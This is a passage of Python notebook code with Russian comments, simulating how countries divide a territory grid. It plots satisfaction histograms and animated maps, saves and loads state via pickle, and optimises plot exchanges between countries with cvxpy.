# ГИСТОГРАММА ТЕКУЩЕГО УДОВЛЕТВОРЕНИЯ СТРАН
def hist(self):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
fig = plt.figure(dpi = 80, figsize = (8, 4)) # гистограмма
plt.title(str(len(self.change_sati)))
mpl.rcParams.update({'font.size': 10})
ax = plt.axes()
plt.xlim( -0.5, len(self.names) - 0.5)
for i in range(len(self.names)):
if self.percent == False:
ax.text(i + 0.15, np.array(self.countries)[:, 1].astype(int)[i], np.array(self.countries)[:, 1].astype(int)[i])
else:
ax.text(i + 0.15, round(np.array(self.countries)[i][1], 3), round(np.array(self.countries)[i][1], 3))
ax.yaxis.grid(True, zorder = 1)
if self.percent == False:
plt.bar([x for x in range(len(self.names))], np.array(self.countries)[:, 1].astype(int), width = 0.3, color = 'blue',
alpha = 0.7, zorder = 2)
else:
plt.bar([x for x in range(len(self.names))], [round(x, 3) for x in np.array(self.countries)[:, 1]], width = 0.3, color = 'blue',
alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names)
plt.legend(loc='upper right')
# АНИМАЦИЯ ГИСТОГРАММЫ УДОВЛЕТВОРЕНИЯ необязательно
#длительность каждого кадра в милисекундах, пропуск кадров, повторять анимацию?)
def anim_hist(self, interval = 200, x = 1, repeat = False):
if self.inline >= 1: # настройка matplotlib
for i in range(self.inline):
%matplotlib notebook
%matplotlib notebook
self.inline = 0
fig = plt.figure(dpi = 80, figsize = (8, 4)) # анимация гистограммы
ranges = (np.array(self.change_sati).max() - np.array(self.change_sati).min()) * 0.1
def function_for_animation(frame_index):
plt.clf()
plt.title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3] + str(min(frame_index * x, len(self.change_map) - 1)))
plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
plt.xlim( -0.5, len(self.names) - 0.5)
mpl.rcParams.update({'font.size': 10})
ax = plt.axes()
for i in range(len(self.names)):
ax.text(i + 0.15, self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i],
self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i])
ax.yaxis.grid(True, zorder = 1)
plt.bar([x for x in range(len(self.names))], self.change_sati[min(frame_index * x, len(self.change_map) - 1)],
width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names)
plt.legend(loc='upper right')
return matplotlib.animation.FuncAnimation(fig, function_for_animation, interval=interval, repeat = repeat,
init_func = None, frames=(((len(self.change_sati) - 1) // x) + 2), blit=True)
# ТЕКУЩАЯ КАРТА И ГИСТОГРАММА УДОВЛеТВОРЕНИЯ СТРАН (расширенная расцветка)
def terr_hist(self, diff = True):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
nrows = 1 # фигура
ncols = 2
fig = plt.figure(figsize=(10, 5))
ax = fig.add_subplot(nrows, ncols, 1)
if diff: # карта
plt.imshow(list(map(lambda a, b, c: list(map(lambda x, y, z: 2*x*(x>0) + x - 2 * y + z, a, b, c)),
np.array(self.unos)[:, :, 2].astype(int), np.array(self.unos)[:, :, 1].astype(int),
np.array(self.unos)[:, :, 5].astype(int))), cmap = cm.viridis)
else:
plt.imshow(np.array(self.unos)[:, :, 2].astype(int))
# гистограмма
if self.percent == False:
plt.title(str(len(self.change_map)) + ' ' + str(np.array(self.countries)[:, 1].astype(int)))
else:
plt.title(str(len(self.change_map)) + ' ' + str([round(x, 3) for x in np.array(self.countries)[:, 1]]))
plt.show()
ax = fig.add_subplot(nrows, ncols, 2)
plt.title(str(len(self.change_sati)))
mpl.rcParams.update({'font.size': 10})
plt.xlim( -0.5, len(self.names))
for i in range(len(self.names)):
if self.percent == False:
ax.text(i + 0.15, np.array(self.countries)[:, 1].astype(int)[i], np.array(self.countries)[:, 1].astype(int)[i])
else:
ax.text(i + 0.15, round(np.array(self.countries)[i][1], 3), round(np.array(self.countries)[i][1], 3))
ax.yaxis.grid(True, zorder = 1)
if self.percent == False:
plt.bar([x for x in range(len(self.names))], np.array(self.countries)[:, 1].astype(int), width = 0.3, color = 'blue',
alpha = 0.7, zorder = 2)
else:
plt.bar([x for x in range(len(self.names))], [round(x, 3) for x in np.array(self.countries)[:, 1]], width = 0.3, color = 'blue',
alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names)
plt.legend(loc='upper right')
# АНИМАЦИЯ КАРsТЫ И ГИСТОГРАММЫ необязательно
# расширенная расцветка, длительность каждого кадра в милисекундах, пропуск кадров, повторять анимацию?)
def anim(self, diff = True, interval = 200, x = 1, repeat = False):
if self.inline >= 1: # настройка matplotlib
for i in range(self.inline):
%matplotlib notebook
%matplotlib notebook
self.inline = 0
nrows = 1 # фигура
ncols = 2
fig = plt.figure(figsize=(10, 5))
ranges = (np.array(self.change_sati).max() - np.array(self.change_sati).min()) * 0.1
if diff: # анимация карты и гистограммы
im = copy.deepcopy(self.start_map_diff)
def function_for_animation(frame_index):
plt.clf()
ax = fig.add_subplot(nrows, ncols, 2)
plt.title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3] + str(min(frame_index * x, len(self.change_map) - 1)))
plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
plt.xlim( -0.5, len(self.names))
mpl.rcParams.update({'font.size': 10})
for i in range(len(self.names)):
ax.text(i + 0.15, self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i],
self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i])
ax.yaxis.grid(True, zorder = 1)
plt.bar([x for x in range(len(self.names))], self.change_sati[min(frame_index * x, len(self.change_map) - 1)],
width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names, rotation=30)
plt.legend(loc='upper right')
ax = fig.add_subplot(nrows, ncols, 1)
for i in range(x):
im[self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][0]][self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][1]] = (self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][2] * 3 - (self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][3] == 'EEZ '))
image = plt.imshow(im, interpolation='None', animated=True, cmap = cm.viridis)
ax.set_title(self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][3] + str(min(frame_index * x,
len(self.change_map) - 1)) + ' ' +
str(self.change_sati[min(frame_index * x, len(self.change_map) - 1)]))
else:
im = copy.deepcopy(self.start_map)
def function_for_animation(frame_index):
plt.clf()
ax = fig.add_subplot(nrows, ncols, 2)
plt.title(self.change_map[min(frame_index * x, len(self.change_map) - 1)][3] + str(min(frame_index * x, len(self.change_map) - 1)))
plt.ylim([np.array(self.change_sati).min() - ranges, np.array(self.change_sati).max() + ranges])
plt.xlim( -0.5, len(self.names))
mpl.rcParams.update({'font.size': 10})
for i in range(len(self.names)):
ax.text(i + 0.15, self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i],
self.change_sati[min(frame_index * x, len(self.change_map) - 1)][i])
ax.yaxis.grid(True, zorder = 1)
plt.bar([x for x in range(len(self.names))], self.change_sati[min(frame_index * x, len(self.change_map) - 1)],
width = 0.3, color = 'blue', alpha = 0.7, zorder = 2)
plt.xticks(range(len(self.names)), self.names, rotation=30)
plt.legend(loc='upper right')
ax = fig.add_subplot(nrows, ncols, 1)
for i in range(x):
im[self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][0]][self.change_map[min(frame_index * x + i, len(self.change_map) -
1)][1]]= self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][2]
image = plt.imshow(im, interpolation='None', animated=True, cmap = cm.viridis)
ax.set_title(self.change_map[min(frame_index * x + i, len(self.change_map) - 1)][3] + str(min(frame_index * x,
len(self.change_map) - 1)) + ' ' +
str(self.change_sati[min(frame_index * x, len(self.change_map) - 1)]))
return matplotlib.animation.FuncAnimation(fig, function_for_animation, interval=interval, repeat = repeat,
init_func = None, frames=(((len(self.change_sati) - 1) // x) + 2), blit=True)
# КАРТА РЕСУРСА (номер ресурса)
def map_resource(self, n):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
plt.imshow(np.array(self.res_map[n]), cmap = cm.viridis)
plt.show()
# КАРТА ВСЕХ РЕСУРСОВ ВМЕСТЕ
def map_all_resources(self):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
arr = self.res_map[0].copy()
for i in range(len(self.res_map) - 1):
arr += self.res_map[i + 1]
plt.imshow(np.array(arr))
plt.show()
# ВСЕ КАРТЫ РЕСУРСОВ
def map_resources(self):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
f, axarr = plt.subplots(len(self.res_map), 1)
for i in range(len(self.res_map)):
axarr[i].imshow(self.res_map[i])
plt.show()
# КАРТА РАССТОЯНИЯ ДЛЯ СТРАНЫ (номер страны)
def map_dist(self, n):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
plt.imshow(np.array(self.dist_map[n]))
plt.show()
# КАРТА ПОЛЬЗЫ ДЛЯ СТРАНЫ (номер страны)
def map_sati(self, n):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
plt.imshow(np.array(self.sati_map[n]))
plt.show()
# КАРТА ПОЛЬЗЫ И РАССТОЯНИЯ ДЛЯ СТРАНЫ (номер страны)
def map_country(self, n):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
f, axarr = plt.subplots(1,2)
axarr[0].imshow(self.dist_map[n])
axarr[1].imshow(self.sati_map[n])
plt.show()
# ВСЕ КАРТЫ РАССТОЯНИЙ ДЛЯ СТРАН
def map_dists(self):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
f, axarr = plt.subplots(len(self.countries), 1)
for i in range(len(self.countries)):
axarr[i].imshow(self.dist_map[i])
plt.show()
# ВСЕ КАРТЫ ПОЛЬЗЫ ДЛЯ СТРАН
def map_satis(self):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
f, axarr = plt.subplots(len(self.countries), 1)
for i in range(len(self.countries)):
axarr[i].imshow(self.sati_map[i])
plt.show()
# ВСЕ КАРТЫ ПОЛЬЗ И РАССТОЯНИЙ ДЛЯ СТРАН
def map_dists_satis(self):
if self.inline == 0: # настройка matplotlib
%matplotlib inline
self.inline = 1
f, axarr = plt.subplots(len(self.countries), 2)
for i in range(len(self.countries)):
axarr[i, 0].imshow(self.dist_map[i])
axarr[i, 1].imshow(self.sati_map[i])
plt.show()
## СОХРАНЕНИЕ И ЗАГРУЗКА ДАННЫХ ##
# СОХРАНИТЬ ТЕРРИТОРИЮ (указать название файла сохранения)
def save(self, name):
if(self.isave == 1): # проверка индикатора для сохранения
print('') # вывод пустого сообщения
self.isave = 0
sys.stdout.write("Saving...\r".format())
sys.stdout.flush()
pd.DataFrame([pd.DataFrame(self.unos), pd.DataFrame(self.countries), # сохранение всех переменных
pd.DataFrame([self.names]), pd.DataFrame([self.ind]), pd.DataFrame(self.d),
pd.DataFrame(self.change_map), pd.DataFrame(self.change_sati), pd.DataFrame(self.start_map),
pd.DataFrame(self.start_map_diff), pd.DataFrame(self.transferable), pd.DataFrame(self.z),
pd.DataFrame([self.exchanged]), pd.DataFrame([self.full]),
pd.DataFrame([self.name, self.i_char, self.i_exch, self.isave, self.sphere,
self.radius, self.inline, self.angle1, self.angle2, self.percent, self.i_exch2])
]).to_pickle(name)
print('Saved! ')
# ЗАГРУЗИТЬ ТЕРРИТОРИЮ (указать название файла)
def load(self, name):
if(self.isave == 1): # проверка индикатора для сохранения
print('') # вывод пустого сообщения
self.isave = 0
# загрузка всех переменных
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
df = pd.read_pickle(name)
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.unos = df[0][0].values.tolist()
sys.stdout.write("Loading...\r".format())
sys.stdout.flush()
self.countries = df[0][1].values.tolist()
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
self.names = df[0][2].values[0].tolist()
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.ind = df[0][3].values[0].tolist()
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
self.d = df[0][4].values.tolist()
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
self.change_map = df[0][5].values.tolist()
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.change_jus = df[0][6].values.tolist()
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
self.start_map =df[0][7].values.tolist()
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
self.start_map_diff =df[0][8].values.tolist()
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.transferable =df[0][9].values.tolist()
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
self.z =df[0][10].values.tolist()
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
self.name =df[0][11].values[0][0]
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.i_char =df[0][11].values[1][0]
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
self.i_exch =df[0][11].values[2][0]
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
self.isave =df[0][11].values[3][0]
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.sphere =df[0][11].values[4][0]
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
self.radius =df[0][11].values[5][0]
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
self.inline =df[0][11].values[6][0]
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.angle1 =df[0][11].values[7][0]
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
self.angle2 =df[0][11].values[8][0]
sys.stdout.write("Loading. \r".format())
sys.stdout.flush()
self.percent =df[0][11].values[9][0]
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
self.i_exch2 =df[0][11].values[10][0]
sys.stdout.write("Loading.. \r".format())
sys.stdout.flush()
#подсчёт карт ресурсов, расстояний и польз
self.res_map = np.zeros((len(self.unos[0][0][0]), len(self.unos), len(self.unos[0])))
self.dist_map = []
self.saty_map = []
for i in range(len(self.countries)):
self.dist_map.append(np.ones((len(self.unos), len(self.unos[0]))) * -1)
self.saty_map.append(np.ones((len(self.unos), len(self.unos[0]))) * -1)
for i in range(len(self.unos)):
for j in range(len(self.unos[0])):
for k in range(len(self.unos[0][0][0])):
if self.unos[i][j][2] != -1:
self.res_map[k][i][j] += self.unos[i][j][0][k] + 1
for k in range(len(self.countries)):
if self.unos[i][j][2] != -1:
if (self.unos[i][j][1] == False) or (self.unos[i][j][5] == True) or (self.unos[i][j][2] == k + 1):
self.dist_map[k][i][j] = self.unos[i][j][3][k]
else:
self.dist_map[k][i][j] = -2
else:
self.dist_map[k][i][j] = -1
if self.unos[i][j][2] != -1:
if (self.unos[i][j][1] == False) or (self.unos[i][j][5] == True) or (self.unos[i][j][2] == k + 1):
self.saty_map[k][i][j] = self.unos[i][j][4][k]
else:
self.saty_map[k][i][j] = -2
else:
self.saty_map[k][i][j] = -1
sys.stdout.write("Loading... \r".format())
sys.stdout.flush()
self.make_exch()
print('Loaded! ')
### СИСТЕМНЫЕ ФУНКЦИИ ###(не для вызова и использования, но если аккуратно, то можно)
## СТАДНАРТНЫЕ РАССЧЁТЫ И ПРИСВОЕНИЯ ##
# РАСЧЁТ РАССТОЯНИЯ ДЛЯ СТРАНЫ (строка участка, столбец участка, номер страны) возвращает минимально расстояние
def dist(self, f, l, i_coun):
if self.sphere: # рассчёт для сферической модели
d = np.linalg.norm(np.array(self.started[i_coun] - np.array([f, l, self.z[f][l]])), axis = 1).min()
return math.acos(1 - 0.5*pow(d / self.radius, 2))*self.radius
else: # рассчёт для плоской модели
return np.linalg.norm(np.array(self.countries[i_coun][2][:, :2]) - np.array([f, l]), axis = 1).min()
# РАСЧЁТ ПОЛЬЗЫ УЧАСТКА ДЛЯ СТРАНЫ (строка участка, столбец участка, номер страны)возвращает[пользая,
#минимальное расстояние]
def sati(self, f, l, i_cun):
dista = self.unos[f][l][3][i_cun] # рассчёт минимального расстояния
# возвращает пользу участка стране и минимальное расстояние
return max(0, ((np.array(self.unos[f][l][0]) * np.array(self.countries[i_cun][0])).sum() *
((self.d[i_cun][1] - dista + 1))
/ (self.d[i_cun][1] - min(dista, self.d[i_cun][0]) + 1)) ** 2)
# БЛИЖАЙШАЯ К УЧАСТКУ СТРАНА (строка участка, столбец участка) возвращает номер ближайшей страны начиная с нуля
def near(self, f, l):
a = [[self.unos[f][l][3][i], -self.unos[f][l][4][i], self.countries[i][1]] for i in range(len(self.countries))]
return a.index(min(a))
# СТРАНА ДЛЯ КОТОРОЙ УЧАСТОК ПРИНЕСЁТ БОЛЬШЕ ПОЛЬЗЫ (строка участка, столбец участка) возвращает номер страны
def most_sati(self, f, l):
a = [[self.unos[f][l][4][i], -self.unos[f][l][3][i], -self.countries[i][1]] for i in range(len(self.countries))]
return a.index(max(a))
# ПРИСВОИТЬ УЧАСТОК СТРАНЕ (строка участка, столбец участка, номер сраны)
def belong(self, f, l, i_cun, func = ''):
if self.unos[f][l][2] > 0: # если страна уже принадлежит кому-то
name_i = self.unos[f][l][2] # перемення прежней страны участка
self.countries[name_i - 1][1] -= (2 - self.percent) * self.unos[f][l][4][name_i - 1] # вычитаем двойную пользу участку у старой страны
self.countries[name_i - 1][3].remove([f, l])# удаление участка из списка участков прежней страны
self.unos[f][l][2] = i_cun + 1 # смена информации о хозяине у участк
if func != 'EEZ ': # если функция передачи не еез
self.countries[i_cun][1] += (2 - self.percent) * self.unos[f][l][4][i_cun] # добавление двойной пользы участка новой стране
self.countries[i_cun][3].append([f, l]) # добавление участка в список участков страны
if func[:8] != 'Exchange':
self.change_map.append([f, l, i_cun + 1, func]) # добавление изменения в список изменения карты
else:
self.change_map.append([f, l, i_cun + 1, func + '(' + str(self.i_exch2) + ')']) # добавление изменения в список изменения карты
if self.percent == False:
self.change_sati.append(np.array(self.countries)[:, 1].astype(int).tolist()) # добавлеине изменения в список польз
else:
self.change_sati.append([round(x, 3) for x in np.array(self.countries)[:, 1]]) # добавлеине изменения в список польз
if func == 'Charity ': # если функция передачи charity
self.i_char += 1 # изменяем счётчик i_char и пишем изменения
sys.stdout.write("Charity: {0}, exchange: {1} ({4}), From {2} to {3} \r".format(str(self.i_char),
str(self.i_exch),
self.names[name_i - 1],
self.names[i_cun], self.i_exch2))
sys.stdout.flush()
self.isave = 1 # меняем счётчик сохранения
elif func[:8] == 'Exchange': # если функция передачи exchange
self.i_exch += 1 # изменяем счётчик i_exch и пишем изменения
sys.stdout.write("charity: {0}, Exchange: {1} ({4}), {5} From {2} to {3} \r".format(str(self.i_char),
str(self.i_exch),
self.names[name_i - 1],
self.names[i_cun],
self.i_exch2,
func[9:]))
sys.stdout.flush()
self.isave = 1 # меняем счётчик сохранения
if (self.exchanged[0].get(int(func[8:])) == None):
self.exchanged[0][int(func[8:])] = 1
else:
self.exchanged[0][int(func[8:])] += 1
## ВСПОМОГАТЕЛЬНЫЕ ФУНКЦИИ ДЛЯ CHARITY РАБОТАЮЩИЕ С SELF.IND ##
# МИНИМАЛЬНО УДОВЛЕТВРЁННАЯ СТРАНА ИЗ ДОСТУПНЫХ = тех, у которых в self.ind соответсвуещему индексу сопоставлен 0
def min_sat(self):
mini = self.countries[self.ind.index(0)][1] # первая доступная страна
answer = self.ind.index(0) # удовлетворённость первой доступной страны
for i in range(1, len(self.countries)):
if self.ind[i] == 0 and self.countries[i][1] < mini: # если удовлетворённость ещё меньше
mini = self.countries[i][1] # то она становится отвевтом
answer = i
return [mini, answer] # возвращаем номер страны и её уровень удовлетворённости
# МАКСИМАЛЬНО УДОВЛЕТВОРЁННАЯ СТРАНА ИЗ ДОСТУПНЫХ
def max_sat(self):
maxi = self.countries[self.ind.index(0)][1] # первая доступная страна
answer = self.ind.index(0) # её удовлетворённость
for i in range(1, len(self.countries)):
if self.ind[i] == 0 and self.countries[i][1] > maxi: # если удовлетворённость ещё больше
maxi = self.countries[i][1] # то она становится ответом
answer = i
return [maxi, answer] # возвращаем номер страны и уровень удовлетворённости
# МАКСИМАЛЬНО УДОВЛЕТВРЁННАЯ СТРАНА ИЗ НЕДОСТУПНЫХ
def max_sat_re(self):
maxi = self.countries[self.ind.index(1)][1] # первая недоступная страна
answer = self.ind.index(1) # уровень удовлетворённости первой недоступной страны
for i in range(1, len(self.countries)):
if self.ind[i] == 1 and self.countries[i][1] > maxi: # если удовлетворённость ещё больше
maxi = self.countries[i][1] # то она становится ответом
answer = i
return [maxi, answer] # возвращаем номер страны и уровень удовлетворённости
## ВСПОМОГАТЕЛЬНЫЕ ДЛЯ ОБМЕНА И СПРАВЕДЛИВОСТИ
# ФОРМИРУЕТ СПИСОК УЧАСТКОВ ДЛЯ ВЗАИМНОГО ОБМЕНА
def make_exch(self):
# формирование пустых списков
self.list_exchange = [[[] for i in range(len(self.countries))] for i in range(len(self.countries))]
self.map_exchange = [[[[] for i in range(len(self.unos[0]))] for i in range(len(self.unos))] for i in range(len(self.countries) + 1)]
for i in range(len(self.unos)): # проход по свободным участком и их запись в список готовых к обмену и в карту обмена
for j in range(len(self.unos[0])):
if ((not self.unos[i][j][1]) and self.unos[i][j][2] not in [-1, 0]):
if (i != 0 and (self.unos[i - 1][j][2] not in [-1, 0])):
if (self.unos[i][j][2] != self.unos[i - 1][j][2]):
self.list_exchange[self.unos[i][j][2] - 1][self.unos[i - 1][j][2] - 1].append([i, j])
self.map_exchange[self.unos[i - 1][j][2] - 1][i][j].append([-1, 0])
if (j != 0 and (self.unos[i][j - 1][2] not in [-1, 0])):
if (self.unos[i][j][2] != self.unos[i][j - 1][2] and len(self.map_exchange[self.unos[i][j - 1][2] - 1][i][j]) == 0):
self.list_exchange[self.unos[i][j][2] - 1][self.unos[i][j - 1][2] - 1].append([i, j])
self.map_exchange[self.unos[i][j - 1][2] - 1][i][j].append([0, -1])
if ((j != len(self.unos[0]) - 1) and (self.unos[i][j + 1][2] not in [-1, 0])):
if (self.unos[i][j][2] != self.unos[i][j + 1][2] and len(self.map_exchange[self.unos[i][j + 1][2] - 1][i][j]) == 0):
self.list_exchange[self.unos[i][j][2] - 1][self.unos[i][j + 1][2] - 1].append([i, j])
self.map_exchange[self.unos[i][j + 1][2] - 1][i][j].append([0, 1])
if ((i != len(self.unos) - 1) and (self.unos[i + 1][j][2] not in [-1, 0])):
if (self.unos[i][j][2] != self.unos[i + 1][j][2] and len(self.map_exchange[self.unos[i + 1][j][2] - 1][i][j] )== 0):
self.list_exchange[self.unos[i][j][2] - 1][self.unos[i + 1][j][2] - 1].append([i, j])
self.map_exchange[self.unos[i + 1][j][2] - 1][i][j].append([1, 0])
for i in range(len(self.unos)):
for j in range(len(self.unos[0])): # формирование карты обмена несвободных участков
if ((self.unos[i][j][1]) or (self.unos[i][j][2] in [-1, 0])):
if (i != 0 and (self.unos[i - 1][j][2] not in [-1, 0]) and (not self.unos[i - 1][j][1])):
self.map_exchange[self.unos[i - 1][j][2] - 1][i][j].append([-1, 0])
if (j != 0 and (self.unos[i][j - 1][2] not in [-1, 0]) and (not self.unos[i][j - 1][1])):
self.map_exchange[self.unos[i][j - 1][2] - 1][i][j].append([0, -1])
if ((j != len(self.unos[0]) - 1) and (self.unos[i][j + 1][2] not in [-1, 0]) and (not self.unos[i][j + 1][1])):
self.map_exchange[self.unos[i][j + 1][2] - 1][i][j].append([0, 1])
if ((i != len(self.unos) - 1) and (self.unos[i + 1][j][2] not in [-1, 0]) and (not self.unos[i + 1][j][1])):
self.map_exchange[self.unos[i + 1][j][2] - 1][i][j].append([1, 0])
for i in range(len(self.unos)):
for j in range(len(self.unos[0])): # формирование списка опасных участков
if ((not self.unos[i][j][1]) and self.unos[i][j][2] not in [-1, 0]):
if (len(self.map_exchange[self.unos[i][j][2] - 1][i][j]) == 1):
if (i != 0 and (self.unos[i - 1][j][2] == self.unos[i][j][2])):
self.map_exchange[-1][i - 1][j].append([1, 0])
elif ((i != len(self.unos) - 1) and (self.unos[i + 1][j][2] == self.unos[i][j][2])):
self.map_exchange[-1][i + 1][j].append([-1, 0])
elif ((j != len(self.unos) - 1) and (self.unos[i][j + 1][2] == self.unos[i][j][2])):
self.map_exchange[-1][i][j + 1].append([0, -1])
elif (j != 0 and (self.unos[i][j - 1][2] == self.unos[i][j][2])):
self.map_exchange[-1][i][j - 1].append([0, 1])
# ВЗАИМОВЫГОДНЫЙ ОБМЕН СЛУЧАЙНЫМИ УЧАСТКАМИ МЕЖДУ ДВУМЯ СТАРАНАМИ
def exch(self, one, two, sides1 = 8, sides2 = 8, ntry = 0):
sys.stdout.write("charity: {0}, Exchange: {1} ({5}), {6} Try {4} from {2} to {3} \r".format(str(self.i_char),
str(self.i_exch),
self.names[one],
self.names[two], ntry,
self.i_exch2,
str(min(sides1, sides2))))
first = [] # список готовых к обмену от первой страны
second = [] # список готовых к обмену от второй страны
firstsati = [] # список изменения удовлетворения стран от передачи участков первой страны
secondsati = [] # список изменения удовлетворения стран от передачи участков второй страны
constteamone = [] # условия для участков первой страны чтобы все соседи участка не ушли без него
constteamtwo = [] # условия для участков второй страны чтобы все соседи участка не ушли без него
constenemyone = [] # условия для участков первой страны чтобы все чужие соседи участка не стали своими, а этот не ушёл
constenemytwo = [] # условия для участков второй страны чтобы все чужие соседи участка не стали своими, а этот не ушёл
# номера случайных участков первой страны
one_numbers = random.sample(range(len(self.list_exchange[one][two])), min(sides1, len(self.list_exchange[one][two])))
# номера случайных участков второй страны
two_numbers = random.sample(range(len(self.list_exchange[two][one])), min(sides2, len(self.list_exchange[two][one])))
# заполнение множеств участков первой страны
for elem in one_numbers:
eleme = self.list_exchange[one][two][elem]
if len(self.map_exchange[-1][eleme[0]][eleme[1]]) == 0:
if eleme not in first:
first.append(eleme)
else:
no = 0
for element in self.map_exchange[-1][eleme[0]][eleme[1]]:
if len(self.map_exchange[two][element[0] + eleme[0]][element[1] + eleme[1]]) == 0:
no = 1
break
if no == 0:
if eleme not in first:
first.append(eleme)
for element in self.map_exchange[-1][eleme[0]][eleme[1]]:
if [element[0] + eleme[0], element[1] + eleme[1]] not in first:
first.append([element[0] + eleme[0], element[1] + eleme[1]])
if len(first) >= sides1:
break
# заполнение множества участков второй страны
for elem in two_numbers:
eleme = self.list_exchange[two][one][elem]
if len(self.map_exchange[-1][eleme[0]][eleme[1]]) == 0:
if eleme not in second:
second.append(eleme)
else:
no = 0
for element in self.map_exchange[-1][eleme[0]][eleme[1]]:
if len(self.map_exchange[one][element[0] + eleme[0]][element[1] + eleme[1]]) == 0:
no = 1
break
if no == 0:
if eleme not in second:
second.append(eleme)
for element in self.map_exchange[-1][eleme[0]][eleme[1]]:
if [element[0] + eleme[0], element[1] + eleme[1]] not in second:
second.append([element[0] + eleme[0], element[1] + eleme[1]])
if len(second) >= sides2:
break
# формирование списков условий первой страны
for i in range(len(first)):
team = len(self.map_exchange[one][first[i][0]][first[i][1]])
teammates = []
enemies = []
enemy = len(self.map_exchange[two][first[i][0]][first[i][1]])
for elem in self.map_exchange[one][first[i][0]][first[i][1]]:
if ([elem[0] + first[i][0], elem[1] + first[i][1]] in first):
team -= 1
teammates.append(first.index([elem[0] + first[i][0], elem[1] + first[i][1]]))
if team == 0:
constteamone.append([i, teammates])
for elem in self.map_exchange[two][first[i][0]][first[i][1]]:
if ([elem[0] + first[i][0], elem[1] + first[i][1]] in second):
enemy -= 1
enemies.append(second.index([elem[0] + first[i][0], elem[1] + first[i][1]]))
if enemy == 0:
constenemyone.append([i, enemies])
# формирование списков условий второй страны
for i in range(len(second)):
team = len(self.map_exchange[two][second[i][0]][second[i][1]])
teammates = []
enemies = []
enemy = len(self.map_exchange[one][second[i][0]][second[i][1]])
for elem in self.map_exchange[two][second[i][0]][second[i][1]]:
if ([elem[0] + second[i][0], elem[1] + second[i][1]] in second):
team -= 1
teammates.append(second.index([elem[0] + second[i][0], elem[1] + second[i][1]]))
if team == 0:
constteamtwo.append([i, teammates])
for elem in self.map_exchange[one][second[i][0]][second[i][1]]:
if ([elem[0] + second[i][0], elem[1] + second[i][1]] in first):
enemy -= 1
enemies.append(first.index([elem[0] + second[i][0], elem[1] + second[i][1]]))
if enemy == 0:
constenemytwo.append([i, enemies])
# заполнение множеств удовлетворений первой и второй страны
for elem in first:
firstsati.append([-self.unos[elem[0]][elem[1]][4][one], self.unos[elem[0]][elem[1]][4][two]])
for elem in second:
secondsati.append([self.unos[elem[0]][elem[1]][4][one], -self.unos[elem[0]][elem[1]][4][two]])
if (len(first) == 0) or (len(second) == 0): # если хоть кому-то нечем обмениваться, то заканчиваем
return 0
sati1 = firstsati + secondsati # объединение множеств польз
selection1 = cvxpy.Bool(len(sati1)) # идентификаторы обмена
z = cvxpy.Variable() # переменная минимального изменения обмена
a = len(first)
constraint1 = [z <= np.array(sati1)[:, 1] * selection1, z <= np.array(sati1)[:, 0] * selection1] # условие поиска оптимума
# добавление условий
for elem in constteamone:
constraint1.append(selection1[elem[0]] - cvxpy.sum_entries(selection1[elem[1]]) >= 1 - len(elem[1]))
for elem in constteamtwo:
constraint1.append(selection1[elem[0] + a] - cvxpy.sum_entries(selection1[[i + a for i in elem[1]]]) >= 1 - len(elem[1]))
for elem in constenemyone:
constraint1.append(selection1[elem[0]] + cvxpy.sum_entries(selection1[[i + a for i in elem[1]]]) <= + len(elem[1]))
for elem in constenemytwo:
constraint1.append(selection1[elem[0] + a] + cvxpy.sum_entries(selection1[elem[1]]) <= len(elem[1]))
total_utility1 = z # оптимизируем z
my_problem1 = cvxpy.Problem(cvxpy.Maximize(total_utility1), constraint1)
my_problem1.solve(solver=cvxpy.GLPK_MI) # решаем проблему
